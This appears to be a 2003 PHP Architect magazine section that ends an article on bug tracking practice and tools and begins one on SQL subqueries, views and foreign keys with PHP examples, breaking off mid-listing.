The bug life cycle would look like this: a quality assurance person finds the bug and submits the bug report. The project manager reviews every bug report. If he finds that the bug is valid, he assigns some attributes to the bug and assigns it to the appropriate developer. The developer then fixes the bug and assigns it to QA for verification. QA repeats the tests on a requirement and the bug gets closed or reopened depending on the problem’s presence in the system.

Anatomy of a bug

Now is a good time to see what bug attributes we need in order to successfully track our bugs.

Components

Components help us to partition and decouple the whole project implementation and also make it easier to find who is in charge of a particular code base. You can divide the project vertically by encapsulating all the code that is solving the same problem domain (business logic) into a component (financial classes, address book and so on) or horizontally by making components of the particular application layers. Or you could do both. There are no strict rules. You should find the scheme that best suits your needs. For example, we could introduce the following components for tracking bugs in the project:
• Presentation layer – all bugs that are related to the user interface such as HTML code, client side code (JavaScript), etc.
• Business layer – malfunctions in business scripts and classes
• Data access layer – bugs in Data Object classes, SQL queries, database wrappers and so on
So when QA reports the bug, the component attribute should address a certain project subsystem in order to make it easier for the project manager to assign it later.

Owner
The owner is the person who is responsible for the bug at a given stage of the bug life cycle. It could be a developer who is responsible for fixing the bug or a QA team member who should verify that a bug is really fixed. This way it is much easier for the project manager to see what bugs are currently unassigned and assign them appropriately.

Severity

Severity is another important bug attribute that tells us how serious our bug is. Some common values are:
• Stopper – this kind of bug stops either the client from using the software or further development (e.g. crashes, bugs in a database wrapper that prevent the whole project from connecting to the database, etc.)
• Critical – serious bug that causes heavy program malfunctions (e.g. bug in a core library that causes other subsystems to act unstable)
• Major – ‘major’ bugs make our software unreliable and can cause serious damage to us or our clients (e.g. bad data calculation in some cases that makes the data unreliable)
• Normal – bugs that are not serious but are unpleasant to our clients (e.g. broken links in pages)
• Minor – small bugs that are not crucial for core program execution, but should be fixed in order to improve the quality of the product (e.g. bad label for a form field)
• Enhancement – this is not a real bug, but a request for a new feature
Priority

Priority is the attribute that is assigned by the project manager and helps developers organize their tasks. It’s a common practice to have five priority levels, and the bugs with higher priorities should be fixed first.

Status

Status is directly connected with the bug life cycle. It tells us in what stage of the bug cycle our bug currently resides. Some commonly used values are:
• New – bug has been reported, but not yet reviewed
• Assigned – bug has been reviewed by project manager and assigned to a particular developer
• Fixed – bug has been fixed by development team and has to be reviewed by QA
• Verified (Closed) – QA has verified that the bug has been fixed
• Reopened – QA has run tests against the bug that was marked as fixed, and some problems still remain, so it is sent back to development for further repair
• Duplicated – this bug has already been reported
• Won’t fix – these are so-called “known bugs” that are not going to be fixed in this development cycle, mostly because of a great risk involved in fixing the bug or the required time for that job
• Invalid – problem that is reported is not a bug
• Works for me – problem that has been reported couldn’t be reproduced so it is put in the repository for later analysis

Subject

Every bug report should have a subject attribute for easier browsing and querying.

Milestone

The software development process is often divided into smaller iterations called milestones. We should keep track of the project milestone that a bug has been reported against and the one for which it has to be fixed. We can demonstrate this by imagining that we have delivered version 1.2 of the project to the client and continued to work on the next release (1.3). We need a way to separate bugs that are reported against these two versions because it is often a completely different code base.
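The status values listed above, together with the life cycle described earlier, can be read as a small state machine. The sketch below is one possible encoding. The lowercase status keys, the BUG_TRANSITIONS table and both function names are hypothetical, and the exact set of allowed moves is an assumption that you would adjust to your own process.

```php
<?php
// Allowed moves between statuses. This table is an assumption for illustration.
const BUG_TRANSITIONS = [
    'new'        => ['assigned', 'duplicated', 'wontfix', 'invalid', 'worksforme'],
    'assigned'   => ['fixed', 'wontfix', 'worksforme'],
    'fixed'      => ['verified', 'reopened'],
    'reopened'   => ['assigned', 'fixed'],
    'verified'   => [],
    'duplicated' => [],
    'wontfix'    => [],
    'invalid'    => [],
    'worksforme' => [],
];

// True when the table permits moving a bug from $from to $to.
function can_transition(string $from, string $to): bool
{
    return in_array($to, BUG_TRANSITIONS[$from] ?? [], true);
}

// Return a copy of the bug with the new status, or refuse the move.
function change_status(array $bug, string $to): array
{
    if (!can_transition($bug['status'], $to)) {
        throw new InvalidArgumentException(
            "Cannot move bug from {$bug['status']} to {$to}"
        );
    }
    $bug['status'] = $to;
    return $bug;
}

// Usage sketch: QA reports, the manager assigns, the fix fails verification.
$bug = ['subject' => 'Add a new customer', 'status' => 'new'];
$bug = change_status($bug, 'assigned');
$bug = change_status($bug, 'fixed');
$bug = change_status($bug, 'reopened');
```

Keeping the transitions in one table means a change in process, such as allowing a “won’t fix” bug to be reopened, is a one-line edit rather than a change scattered through the code.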
Comments

Comments are a very important and useful attribute of the bug. We should always allow our team members to enter an unlimited number of comments on the bug. Doing so will allow us to keep track of the communication and history of the bug. An initial comment for the bug could be a description of the problem that QA (or the client) has found in our software.

Attachment

In some development organizations a very limited number of developers can commit changes to the code repository. In this case, the bug’s attachment attribute is used to add patches of code that fix bugs. Attachments can also be used for many other purposes, like screen shots, test cases and all material that helps to document the bug properly.

The bug attributes described above are just a small subset of commonly used attributes. You should, of course, adjust these attributes to the specifics of your individual project and process. Some additional attributes that can be useful to describe the bug are web browser (particularly interesting for web application development), URL of the page in which the bug appears, operating system (for platform specific problems) and many, many more.

Now that we know how to define our bugs, we should mention the process of collecting new feature requests for our project. This process is sometimes very closely related to the bug management process. When we were talking about the bug severity attribute earlier, we said that a special value could be introduced to separate the bug from a request for enhancement (RFE). Basically a feature request could have a very similar structure to the bug report and, since many bug tracking tools support this functionality, it is natural (to some point) to keep track of enhancement requests in the same repository as bugs.

Bug reports

OK, we have now discussed some basic information about the structure and life cycle of bugs. This information, however, is not enough for a successful bug tracking process. In order to make your process efficient, the QA department needs to supply useful bug reports to the development team. The more information developers have to work on, the sooner the bug will be traced and fixed. When submitting a bug report, there are a few things to keep in mind. First things first: a basic rule in any bug tracking process is to always try to repeat the bug before submitting the report. This is very important because some bugs occur only under very specific circumstances and environment settings. You must be sure that you know the specific environment variables and steps that lead to the malfunction that you are going to submit. Of course, some bugs are almost impossible to trace, but even then you should make it easier for the developer by pointing him to all of the things that failed to repeat it. That way we can save some time by not duplicating effort, and it gives certain clues to the development team about what could be the problem.

Let’s take a look now at what makes a good report. We can start by showing one bad example and go through to see how to make it better. Let’s say that a report like this is submitted:

When I inserted some customer data and clicked on the “Save changes” button, an error page was displayed.
When a developer gets a message like this, the only thing he knows is that some problem exists in the process of adding a new customer. He can’t begin fixing the problem without actually contacting the person that submitted this report because he hasn’t a clue where to start. So, the usual questions end up being asked: What error was displayed? What data did you submit? On what page did the error occur? In 99% of the cases, the submitter doesn’t remember all the details because it was a “century” ago, and we’re trapped in an infinite loop. But, if we use another approach and submit a report like this, everything could be very different:
• Operating system: Windows XP
• Browser: Mozilla 1.3
• URL: http://someproject.someurl/1/customer_add.php
• Component: Address book
• Version: 1.0
• Subject: Add a new customer
• Brief description: submitting of a new customer with the regular data failed
• Steps:
  Log in
  Click the link to the address book
  Click “Add new customer” button
  Enter the data (see “data” section)
  Click “Save changes” button
• Data:
  Name: Dejan Bosanac
  Email: [email protected]
  Title: Software developer
  All other fields: empty (default)
• Expected results: The data is submitted to the database and “view” page for the customer is displayed
• Actual results: Error page with a message “Error executing SQL query: phone_number field cannot be NULL”
• Conclusion: Problem is probably in bad JS validation for phone number field under Mozilla browser
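A tracking form can check mechanically that a report carries the kinds of information shown in the sample above before it is accepted. The following is a minimal sketch of such a check, not part of any particular tool: the field names in REQUIRED_REPORT_FIELDS and the function missing_report_fields() are hypothetical, and every field value is assumed to be a plain string.

```php
<?php
// Fields a useful report should carry, following the sample report above.
// The key names are hypothetical and chosen only for this sketch.
const REQUIRED_REPORT_FIELDS = [
    'description', 'environment', 'steps', 'data', 'expected', 'actual',
];

// Return the names of required fields that are missing or blank.
// Assumption: every value in $report is a string.
function missing_report_fields(array $report): array
{
    $missing = [];
    foreach (REQUIRED_REPORT_FIELDS as $field) {
        if (!isset($report[$field]) || trim($report[$field]) === '') {
            $missing[] = $field;
        }
    }
    return $missing;
}

// Usage sketch: the vague one-sentence report fails almost every check.
$vague   = ['description' => 'An error page was displayed after "Save changes".'];
$missing = missing_report_fields($vague);
```

A submission form could show the returned list to the reporter right away, while the details are still fresh.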
With a report like this, the developer could spot the problem in a moment and fix it. Most of the fields (attributes) in this report have been described in the basic bug anatomy, so it is likely that your bug-tracking solution will support them. All the specific data of the problem should be put in a comment or an attachment to the bug. We can now summarize what a good report should consist of:
1. Brief description of the problem
2. Environment under which the problem occurs
3. Steps needed to reproduce the problem
4. Specific inputs that caused the problem
5. Expected and actual results
6. Summary of what the problem could be
Of course, the details of each step depend on what the specific problem is. For example, if the bug is found during unit testing, input data should be the test case that caused the bug (you can attach the test class that caused the bug, if you want). Or, in another extreme case, if it is a visual (cosmetic) bug, all you have to submit is how to enter the specific page and what is wrong (environment-specific data is always useful). A general rule is that the more complex the problem is, the more information the developer is going to need.

Bug tracking and development cycles

For successful bug and request tracking there are a few more issues that you must keep in mind. The development cycle plays a key role in how the process is handled. It can be divided into three phases:
• Development – implementation of the system functionality, resulting in huge changes to the codeset
• Code freeze – software has entered beta testing phase and code is usually frozen
• Release planning – preparations for the next project release are under way
In order to have an efficient development process, we will look at how to use the bug-tracking system in each of these phases.

In the development phase, good practice dictates that developers create test cases at the same time they write the code. A test case is code that is written to test certain functionality and to report the error if it is found. This way, we will actually have confirmation that the software is doing the job for which it is meant. These test cases are normally grouped in a test suite that is executed regularly (preferably every night). This type of testing is called regression testing. We will not get into this in this article, but it is important to mention it because it affects the bug tracking process itself. Some authors say that in this stage of development we should not use a bug-tracking system as a repository for bug issues, as our test suite would keep this information for us. They would advise, though, using a bug-tracking system for storing features that will be introduced later in the process. While this may be true to some point, some errors cannot be detected with regression testing. Defects that are found during code reviews, user experience issues, and visual defects are just some of the bugs that we must handle outside of a test suite. So, my opinion is that in this phase we shouldn’t really submit duplicate reports to the system, but all the other issues that are reported during testing should be stored. If we don’t do this, we can easily forget about them until it is too late. Of course, if you don’t have automated testing introduced into your process, you should keep all the issues this way. Feature requests are always good to store in the system for later analysis.
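The idea of a test case and a test suite described above can be sketched in a few lines. Everything here is hypothetical and only illustrates the concept: customer_is_valid() stands in for the code under test, and run_suite() is a stand-in for whatever testing framework you actually use.

```php
<?php
// Hypothetical function under test: a customer record needs a phone number.
function customer_is_valid(array $customer): bool
{
    return isset($customer['phone_number']) && $customer['phone_number'] !== '';
}

// Each test case is a named check that returns true on success.
$suite = [
    'accepts customer with phone' => function () {
        return customer_is_valid(['name' => 'A', 'phone_number' => '555-0100']) === true;
    },
    'rejects customer without phone' => function () {
        return customer_is_valid(['name' => 'A']) === false;
    },
];

// Run every case and collect the names of those that fail.
function run_suite(array $suite): array
{
    $failures = [];
    foreach ($suite as $name => $case) {
        if ($case() !== true) {
            $failures[] = $name;
        }
    }
    return $failures;
}

// A nightly job could run this and file or reopen issues for any failures.
$failures = run_suite($suite);
```

Because each case has a name, a failure reported by the nightly run already reads like the subject line of a bug report.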
In the code freeze (beta testing) phase, the code is usually frozen and no immediate changes can be made. Now, we should keep track of all malfunctions found so that they can be fixed before the final release. It is also convenient to keep track of users’ feature requests (usually beta testers are potential future users). At this point, we should introduce a request “grade”. In other words, we should keep track of how many requests we have for each feature, so we can easily separate the must-have features from the eccentric ones.

When you are ready to start planning the next release, you can use the information stored in your tracking system. According to the request grade you can decide what features will become part of the next release. One more thing is important in this stage: you must estimate the effort needed to implement certain features. For example, if some feature is a must-have feature and it requires minor code changes, then it should definitely be planned for the next release. In the case where the feature implementation requires huge code refactoring and involves great risk, you should think of delaying it to some future release. When you have specifications for future releases, you should build the test cases for them and mark those requests as closed (remove them from the system).

Bug tracking tools

To start implementing organized bug management in your organization, all you need is some concrete bug-tracking software. You could use a well-defined sheet in Excel-like software. You will soon see, however, that it would be much more efficient if you had just a little more. Many companies decide to build their own solutions, often seriously underestimating the effort for such a task. Many start with no clear idea of what they really want or need, and start coding a solution with minimal requirements. Soon after, they realize that maintenance and improvements to the solution are not cost effective by any means, and that the costs of later porting to some commercial solution are much higher than they would have been at the start. Even if you have a small budget, it is not really hard to find a free solution among today’s open source software. Many of these solutions will save you enormous time and manpower compared to building your own solution. That way, your developers can focus on building the project that needs the bug tracking process and not the particular tool itself. So, let’s start talking about what the defect-tracking tool needs to provide you.

How to choose the right tool for you?
Before starting your search for a bug-tracking tool, you should have a clear vision of your bug tracking process so you can choose the tool that meets your needs. Let’s divide the requirements into two basic groups: business requirements and technical requirements.

Business requirements

First of all, you should fit the tool into your current company profile and budget. There are various systems on the market with a wide price range, so you should start by positioning yourself into a group that you can currently afford. If your budget is small, don’t worry, there are many very nice open-source solutions. There are also companies that allow you to outsource this service to them for a reasonable amount.

Second, you should know who the users of the bug management system will be, and if they have any specific needs. You will also need to be aware of how many users will be using the system, as well as their locations. The price of the bug management tool is often related to this information. You can divide users into two large groups.
Internal users
• QA staff will submit and query reports to find bugs that need to be verified
• Developers will query reports to find assigned tasks
• Project manager will query reports to find unassigned bugs, and also run metrics on the data
External users
• Customers
• Clients
• Beta Testers
External users may like to submit enhancement requests or bugs, and see the progress and status of certain issues. In this case, you will probably be searching for a tool that can be exposed to the web for external (and, of course, internal) users.

This leads us to the question of security. Does the potential tool allow the creation of groups of users, as well as the separation of their privileges on actions and data? We might want to only allow external users to query a small subset of all issues (for example, only those that they have entered), and allow them only to submit new reports, but not allow them to modify existing data. We could, of course, enable only some groups to submit reports, but I think that it would be better to allow all users to submit, as fewer bugs will be missed that way. We could also expect that only project management staff could change details such as severity and priority. All of these decisions are up to you.

Usability of the system is another important parameter. Does the potential tool define the bug workflow that you need? Could it be configured?
Does the bug submission form have all of the attributes that you need? Could it be configured? It is very important for the tool to be easy to use, as that will minimize the resistance to the tool by team members that may jeopardize the whole process. You should also consider whether the tool
September 2003
●
PHP Architect
●
www.phparch.com
supports various methods of notification when a bug status changes. Does the software send email or SMS messages, or offer any other advanced techniques for notification? You may want the project manager to be immediately notified when a new critical bug report arrives, or you could enable your customers to be alerted when a certain bug is fixed.

Administration concerns are the last issue that we will mention for the business requirements. We should know whether we have someone with the skills needed for successful deployment, configuration, and maintenance of the system, and how much time this is going to take away from their regular duties. If this is a problem, then employing another person for this task must be considered. The administration of the bug management tool is usually the responsibility of project and network/database administrators.

Technical requirements

Technical requirements for defect tracking software are basically the same as for all other software products.

• Reliability – software is stable and takes care of data consistency
• Robustness – software behaves well in extreme conditions and large data volumes
• Programmability – software has an application programming interface (API) through which it can be extended to your particular needs
• Security – software gives needed security for the data and has no security flaws that can be easily exploited
• Supportability – software vendor gives fair technical support for their product
• Scalability – software is adaptable to your particular needs

These are just basic technical concerns. You should also consider your current environment and skills. For example, does the product support database servers that you are comfortable with (MySQL, Sybase, Oracle, etc.)? Does the server code (in client/server and web-based solutions) suit your current development environment (Linux, Windows 2000, …), or will you need to prepare a new server for it?
There are many factors to consider when choosing the perfect solution. One final tip: you should actually try every solution that seems suitable, since you won’t necessarily find the flaws just by reading the product specification.
FEATURES
Introduction to Bug Management
Some popular solutions

As I said before, many software packages are built for this specific need. We will mention two common ones; the further hunt is up to you.

• Bugzilla (http://www.mozilla.org/projects/bugzilla/) – this product has its genesis in the open-source Mozilla web browser. It was written in Perl to replace an old bug tracking system used internally at Netscape Communications. It quickly became the de facto standard in the open source community, so you can see it in action on many projects on the web. Unix-like environments are natural for this software, and it is very well integrated with MySQL (but that’s the only database server that is currently supported). The source code comes under a mix of various licence policies that include the Netscape Public License (NPL), the Mozilla Public License (MPL), the GNU General Public License (GPL) and the GNU Lesser General Public License (LGPL).

Some features worthy of note:
– Integrated, product-based granular security schema
– Inter-bug dependencies and dependency graphing
– Advanced reporting capabilities
– A robust, stable RDBMS back-end
– Extensive configurability
– A very well-understood and well-thought-out natural bug resolution protocol
– Email, XML, console, and HTTP APIs
– Available integration with automated software configuration management systems, including Perforce and CVS (through the Bugzilla email interface and checkin/checkout scripts)

There are also some drawbacks that will be addressed in the future:
– Reliance on only a single database server (MySQL)
– Rough user interface
– Spartan email notification templates
– Little report configurability
– Some unsupported bug statuses
– Little support for internationalisation
– Dependence on some non-standard libraries
• Elementool (http://elementool.com) – It is possible these days to outsource your bug tracking to some other company. This is very convenient in situations when you don’t have, or can’t afford, more time and resources for the solution. All you need is a few minutes to set up your account using your web browser, and you are ready to start. Also, this is an ideal solution for one-off projects because you can cancel your account at any time with no obligations. With this approach you don’t have any concerns regarding installing and updating your software, since you will always have the latest version ready for use.

Their basic free package includes:
– 200 issue storage capacity
– Unlimited number of users
– Mail notifications
– Downloadable database for your own backup
For extra features like reports, history trail, customisable forms and so on, you must register for an advanced, commercial package.
These are just representatives of two approaches; you should really spend some more time to find a perfect solution for your needs.

Closing word

The aim of every professional software package is a satisfied customer. If you have an organized process for tracking bugs and feature requests in your project, you can be sure that fewer bugs will be detected by customers, and that the time cycle needed to fix those bugs (and track down new requirements) will be noticeably shorter. There are many tools available on the market that could help you organize your defects and requirements, but, before you start tracking them, be sure that you know what you need. Bug tracking is closely related to quality assurance issues and team organization, so it is important to start from there. Just try it; it’s easier than it sounds.

About the Author
Dejan Bosanac works as a full-time software developer for DNS Europe Ltd (http://www.dnseurope.net) on the billing software system for ISPs. In his spare time he also serves as a Lead Engineer at Noumenaut Software (http://www.noumenaut.com) on the online journaling project. He holds a Bachelor’s degree in Computer Science and is currently pursuing a master’s degree in the same field.
Advanced Database Features Exposed
F E A T U R E
by Davor Pleskina
Databases have ceased to be a mystery. Designing and setting up databases and database-driven applications is no longer a terribly complicated task handled successfully only by specialists and technicians. Behind almost every site that consists of more than a product brochure is some kind of database from which information is retrieved and presented.

Although most web applications do not require highly advanced database servers, some of these servers provide more advanced features – such as subqueries, referential integrity, transaction handling, and support for stored procedures and triggers – which can make a developer’s life far easier. We will examine these features from a higher level, giving examples of their use and usefulness, as well as showing how some of them can be simulated at a low level within PHP.

Perhaps you have heard of some of these features, and maybe even used some of them. This article’s intent is to lower the bar for the uninitiated, and hopefully show you a right tool or two for the job. I mean, there is no sense trying to develop a semi-usable transaction handling system in PHP (which would be a difficult task indeed), when you could just use a database with transaction support built in, right?

As much as possible, I’ll try to avoid database-specific code. To avoid presenting database-specific PHP examples, I am going to use the PEAR DB class. PEAR (the PHP Extension and Application Repository) is a free online PHP software repository, and can be found at http://pear.php.net. PEAR is usually installed automatically when you install PHP using common install packages. In all examples, we will assume that we are already connected to a database server, and that we already have a database connection handle which we are going to call $dbh. There will also be no error messages
specific to any RDBMS. As far as requisite knowledge for the article goes, we’ll assume a basic understanding of SQL, and go from there.

Some Data

We are going to need some real world tables and relationships to simulate situations in which our advanced database features become necessary. Suppose we have two small tables, one containing data about our customers, and the other containing their addresses (we might expect a customer to have more than one address). These tables are going to contain a very small number of columns, and we will avoid specifying data types. Here are the table structures we’ll work with:

CUSTOMER table:
    CUSTOMER_ID
    FIRST_NAME
    LAST_NAME
    GENDER
    ADDITIONAL_INFO
    LAST_CHANGE

ADDRESS table:
    ADDRESS_ID
    CUSTOMER_ID
    STREET
    CITY
    POSTAL_CODE
    STATE
    COUNTRY
    LAST_CHANGE
It may be apparent that CUSTOMER_ID is going to be our customer’s unique identification number, as well as that table’s primary key. Other information that we will store about the customer includes first and last name, gender, and any desired additional info. The last column in the CUSTOMER table represents the date of the last change made to a specific customer’s information.

The ADDRESS table can hold more than one address for a single customer. The unique identifier and primary key for each address is stored in a column named ADDRESS_ID. This table must also contain a reference to the appropriate customer, and this is found in the CUSTOMER_ID column. Specific address data is also stored, including the street, city, postal code, state and country columns, while the last column again holds information about when the specific record last changed.

Subqueries

You can think of subqueries (or sub-SELECTs) as SELECTs within other SELECTs. A simple example could look like:

    SELECT something
    FROM table_1
    WHERE something IN (
        SELECT something_else
        FROM table_2
        WHERE something_else LIKE 'more conditions'
    )...

Let’s look at a demonstration of the importance and use of subqueries. Consider that from time to time we want to remove customers who do not have any addresses in our database. To do that without subqueries would require a number of steps. We would need to browse the CUSTOMER table record by record, checking for matching records in the ADDRESS table and deleting the customers with none. An example of doing this with PHP is shown in Listing 1. Using a subquery, we could do all of this in one step with the following statement:

    DELETE FROM CUSTOMER
    WHERE NOT EXISTS
        (SELECT CUSTOMER_ID
         FROM ADDRESS
         WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID)
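As you can see, the subquery will perform a small join on CUSTOMER and ADDRESS. If the subquery doesn’t return a row for a particular customer, it means that there are no addresses for that customer in the ADDRESS table, and the customer can be deleted. What a job done in only one statement!

Listing 1

<?php

// The opening lines of this listing were lost in extraction. The function
// wrapper and the three query strings are reconstructed from the way they
// are used below and should be read as assumptions.
function delete_customers_without_addresses($dbh)
{
    $query_customers       = "SELECT CUSTOMER_ID FROM CUSTOMER";
    $query_check_address   = "SELECT COUNT(*) AS CNT_ADDRESS FROM ADDRESS WHERE CUSTOMER_ID = ";
    $query_delete_customer = "DELETE FROM CUSTOMER WHERE CUSTOMER_ID = ";

    $result_customers = $dbh->query($query_customers);

    // OK, process each row in result set
    // (DB_FETCHMODE_ASSOC lets us read columns by name)
    while ($row_customer = $result_customers->fetchRow(DB_FETCHMODE_ASSOC)) {

        // Get customer ID
        $customer_id = $row_customer['CUSTOMER_ID'];

        // Count addresses
        $result = $dbh->query($query_check_address . "'$customer_id'");
        $row = $result->fetchRow(DB_FETCHMODE_ASSOC);

        // Get number of addresses
        $count = $row['CNT_ADDRESS'];

        if ($count < 1) {
            // No addresses, delete the customer
            $dbh->query($query_delete_customer . "'$customer_id'");
        }
    }
}

?>

The subquery statement could also have been written using the IN operator, like this: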
DELETE FROM CUSTOMER WHERE CUSTOMER_ID NOT IN (SELECT CUSTOMER_ID FROM ADDRESS)
This is a different approach to doing the same job, but it returns and checks more data for each customer, which is not recommended when the tables involved store a large amount of data. In such cases, EXISTS is a more suitable operator.

If your applications use very complex SQL statements to retrieve data, you can also simplify them, and avoid joining too many related tables, by using subqueries to retrieve a single data column from related tables. Note the following two statements, which return the same result for every customer that has at least one address (the second also lists customers with no addresses, with a count of 0):

    SELECT CUSTOMER.CUSTOMER_ID, COUNT(*) AS NO_OF_ADDRESSES
    FROM CUSTOMER, ADDRESS
    WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID
    GROUP BY CUSTOMER.CUSTOMER_ID

    SELECT CUSTOMER.CUSTOMER_ID,
        (SELECT COUNT(*)
         FROM ADDRESS
         WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID) AS NO_OF_ADDRESSES
    FROM CUSTOMER
In both cases, the customer’s ID and count of related addresses is returned; however, in the first statement we had to group data using the GROUP BY clause, which is in most cases a slow operation on large tables. In the second statement, we executed a small and quick subquery (it is quick because it retrieves only related data from the ADDRESS table for each customer and counts it using the table’s keys), thereby avoiding joining and grouping.

Although, at first sight, the second statement looks more complex than the first one, think what it would look like if we had to join and group more than two tables with many fields: many field names would appear in the WHERE and GROUP BY clauses, and the SELECT list would look much more complicated. Field name conflicts could also appear, and we would be forced to prefix the table name to each field which appears more than once. We should also mention that all field names in a subquery are local to that statement, and we do not need to worry about conflicts with field names in the main statement.
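The two subquery forms discussed above can be tried end to end with a small script. The following is only a sketch under stated assumptions: it uses PDO with an in-memory SQLite database rather than the PEAR DB handle used in the article, the tables are cut down to a few columns with assumed types, and the sample rows are invented for illustration.

```php
<?php
// Sketch only: PDO and in-memory SQLite are stand-ins, not the article's PEAR DB setup.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Cut-down versions of the CUSTOMER and ADDRESS tables (column types are assumed).
$pdo->exec('CREATE TABLE CUSTOMER (CUSTOMER_ID INTEGER PRIMARY KEY, LAST_NAME TEXT)');
$pdo->exec('CREATE TABLE ADDRESS (ADDRESS_ID INTEGER PRIMARY KEY, CUSTOMER_ID INTEGER, CITY TEXT)');
$pdo->exec("INSERT INTO CUSTOMER VALUES (1, 'Adams'), (2, 'Baker'), (3, 'Clark')");
$pdo->exec("INSERT INTO ADDRESS VALUES (10, 1, 'Zagreb'), (11, 1, 'Rijeka'), (12, 2, 'Split')");

// Correlated subquery: one address count per customer, including customers with none.
$counts = $pdo->query(
    'SELECT CUSTOMER.CUSTOMER_ID,
            (SELECT COUNT(*) FROM ADDRESS
              WHERE ADDRESS.CUSTOMER_ID = CUSTOMER.CUSTOMER_ID) AS NO_OF_ADDRESSES
       FROM CUSTOMER
      ORDER BY CUSTOMER.CUSTOMER_ID'
)->fetchAll(PDO::FETCH_KEY_PAIR);
$counts = array_map('intval', $counts);

// NOT EXISTS subquery: remove every customer that has no address row.
$deleted = $pdo->exec(
    'DELETE FROM CUSTOMER
      WHERE NOT EXISTS (SELECT CUSTOMER_ID FROM ADDRESS
                         WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID)'
);

// IDs of the customers that survived the clean-up.
$remaining = array_map(
    'intval',
    $pdo->query('SELECT CUSTOMER_ID FROM CUSTOMER ORDER BY CUSTOMER_ID')
        ->fetchAll(PDO::FETCH_COLUMN)
);

print_r($counts);
echo "Deleted: $deleted\n";
```

With these sample rows, customer 3 is the only one without an address, so it is the only row the DELETE removes.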
If your statements are complex, the use of subqueries can often help to simplify them. This is not to say that there are not good reasons to use each of these other methods. Depending on the SQL statement’s complexity, the number of joined tables, and the amount of data processed, each method will behave differently.

Views

A view is a virtual table which does not physically exist. It is defined as a query on one or more tables and stored in the database definition as an SQL statement. You can do any kind of SELECT from a view, and use it in any SQL statement just as you would any physical table. Views can sometimes be updated and deleted from, but whether a view is updateable or not depends on the complexity of its SQL definition and join conditions. Views can be created, altered, or dropped just like regular tables.

Let’s return to our problem of counting a customer’s addresses from table ADDRESS. Instead of doing a subquery or creating a temporary table to hold the counts of all addresses for each customer, we could simply create a view like this one:

    CREATE VIEW CUSTOMER_ADDRESS_COUNT AS
    SELECT CUSTOMER_ID, COUNT(*) AS NO_OF_ADDRESSES
    FROM ADDRESS
    GROUP BY CUSTOMER_ID
We have defined a virtual table named CUSTOMER_ADDRESS_COUNT, which contains one row for each customer that has addresses, with those addresses counted in field NO_OF_ADDRESSES. Now we can select data from the view by issuing a statement like

    SELECT * FROM CUSTOMER_ADDRESS_COUNT

We will get a set of rows containing CUSTOMER_ID and NO_OF_ADDRESSES for each customer, just like we did with the previous SQL statements that used subqueries or joins. Having this view defined, we could now repeat our address count check from Listing 1, avoiding the $query_check_address SQL statement. Better than that, our main query can be changed so that it returns only customers with no addresses. (For this to work, the view must also contain a row with a count of 0 for customers without addresses, which means defining it with an outer join from CUSTOMER to ADDRESS; the view as written above lists only customers that have at least one address.)

    SELECT *
    FROM CUSTOMER, CUSTOMER_ADDRESS_COUNT
    WHERE CUSTOMER.CUSTOMER_ID = CUSTOMER_ADDRESS_COUNT.CUSTOMER_ID
    AND NO_OF_ADDRESSES = 0
This statement immediately returns only customers without addresses, and we can delete them easily. Views can be (and are) used to do much more complex things than this. In fact, their main purpose is simplification of SQL statements. Views can also be used to restrict database access, often hiding the structure and full contents of the physical tables from whoever selects data.

Referential Integrity

As explained in pretty much any relational database theory book, referential integrity prevents applications from creating inconsistent data entries in a database. It is usually represented by some kind of relationship between two database objects (tables), or simply with some rules that determine which data can be entered into existing database objects. As a simple example, referential integrity could prevent entering data into table X if some corresponding data does not exist in table Y. Likewise, it could prevent applications from deleting any data in table X that has corresponding data in table Y.

Many relational database systems support different modes of referential integrity, but the most common method is the creation of foreign keys. If table X has a foreign key that points to a field in table Y, a referential integrity system might restrict adding records to table X that don’t refer to a value in that table Y field. It might also prevent deletion or single-side change of the linked data in table Y, or take care that all deleted or modified data in table Y is likewise deleted and modified in all linked tables (table X). While the former method is preventative or restrictive, the latter method cascades changes from table Y to table X, and is thus referred to as “cascading delete” and “cascading update”.

In our case, we should take care that users handling our application do not delete a customer from the CUSTOMER table if there are addresses stored in the ADDRESS table that belong to him.
Deleting the customer data (as in Listing 2) would leave his addresses orphaned, and there is the possibility that they could be unwittingly re-attached at a later time to some newly entered customer (if the deleted customer’s ID was re-used when a new customer was added).

With referential integrity, we can easily establish a relation between the CUSTOMER and ADDRESS tables by creating a FOREIGN KEY in table ADDRESS which points to the customer’s ID in CUSTOMER. We should give the key a name, so let’s make it FK_ADDRESS_CUSTOMER_ID, simply showing that it relates the ADDRESS table to the
CUSTOMER table through column CUSTOMER_ID. Our foreign key will do several things for us:

• it will prevent us from entering a CUSTOMER_ID into the ADDRESS table that does not yet exist in the CUSTOMER table.
• it will prevent us from deleting a customer whose CUSTOMER_ID is referenced from addresses stored in the ADDRESS table.
• if defined with an ON … CASCADE clause, it would ensure that deleting a customer would delete all his addresses, or that updating his CUSTOMER_ID in the CUSTOMER table would update it in all referring records in the ADDRESS table.

Our foreign key definition should normally be specified in the ADDRESS table creation code, and might look like:

    FOREIGN KEY FK_ADDRESS_CUSTOMER_ID (CUSTOMER_ID)
    REFERENCES CUSTOMER (CUSTOMER_ID)

The above statement creates a restrictive foreign key. To add support for cascading, use:

    FOREIGN KEY FK_ADDRESS_CUSTOMER_ID (CUSTOMER_ID)
    REFERENCES CUSTOMER (CUSTOMER_ID)
    ON UPDATE CASCADE
    ON DELETE CASCADE
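The difference between the restrictive and the cascading key can be seen by attempting the same DELETE against each. This is a minimal sketch, assuming PDO with in-memory SQLite instead of the article’s PEAR DB handle; the helper name try_delete_customer is hypothetical, the tables are reduced to their key columns, and `PRAGMA foreign_keys = ON` is SQLite’s own switch for enforcing foreign keys (other servers enforce them without it).

```php
<?php
// Hypothetical helper: builds the two tables with the given ON DELETE rule,
// tries to delete a customer who has one address, and reports what happened.
function try_delete_customer(string $onDelete): array
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('PRAGMA foreign_keys = ON'); // SQLite-specific: enforce foreign keys

    $pdo->exec('CREATE TABLE CUSTOMER (CUSTOMER_ID INTEGER PRIMARY KEY)');
    $pdo->exec(
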